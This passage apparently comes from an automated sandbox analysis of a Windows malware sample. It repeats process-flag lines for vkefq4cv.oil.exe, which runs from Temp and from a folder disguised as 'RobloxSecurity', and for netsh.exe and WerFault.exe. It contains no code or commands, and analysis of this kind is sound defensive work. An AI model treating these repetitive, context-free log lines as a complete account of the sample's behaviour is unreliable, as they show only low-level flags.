                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
